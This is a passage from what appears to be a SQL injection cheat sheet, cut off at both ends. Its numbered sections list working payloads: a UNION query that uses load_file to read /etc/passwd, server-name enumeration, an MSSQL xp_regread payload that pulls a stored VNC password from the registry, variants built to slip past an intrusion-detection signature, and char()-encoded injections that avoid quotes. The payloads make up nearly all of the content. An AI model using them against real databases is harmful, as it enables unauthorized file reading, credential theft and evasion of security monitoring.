MySQL
CREATE USER name IDENTIFIED BY 'pass123'

Postgres (requires a Unix account)
CREATE USER name WITH PASSWORD 'pass123'

Oracle
CREATE USER name IDENTIFIED BY pass123
  TEMPORARY TABLESPACE temp
  DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;
7. MySQL interactive query

Use a UNION query to dump the contents of a file, as follows:

- ' union select 1,load_file('/etc/passwd'),1,1,1;

8. System service name and configuration

- ' and 1 in (select @@servername)--
- ' and 1 in (select servername from master.sysservers)--

9. Finding the VNC password (registry)

The test statements are as follows:

- '; declare @out binary(8)
- exec master..xp_regread @rootkey = 'HKEY_LOCAL_MACHINE',
- @key = 'SOFTWARE\ORL\WinVNC3\Default',
- @value_name='password',
- select cast (@out as bigint) as x into TEMP--
- ' and 1 in (select cast(x as varchar) from temp)--

10. Evading IDS detection

Evading the ' OR 1=1 signature:

- ' OR 'unusual' = 'unusual'
- ' OR 'something' = 'some'+'thing'
- ' OR 'text' = N'text'
- ' OR 'something' like 'some%'
- ' OR 2 > 1
- ' OR 'text' > 't'
- ' OR 'whatever' in ('whatever')
- ' OR 2 BETWEEN 1 and 3

11. Using the char() function in MySQL

Injection without quotes, e.g. (string = "%"):

--> ' or username like char(37);

Injection with quotes, e.g. (string = "root"):

--> ' union select * from users where login = char(114,111,111,116);
Using the load_file function in UNIONs, e.g. (string = "/etc/passwd"):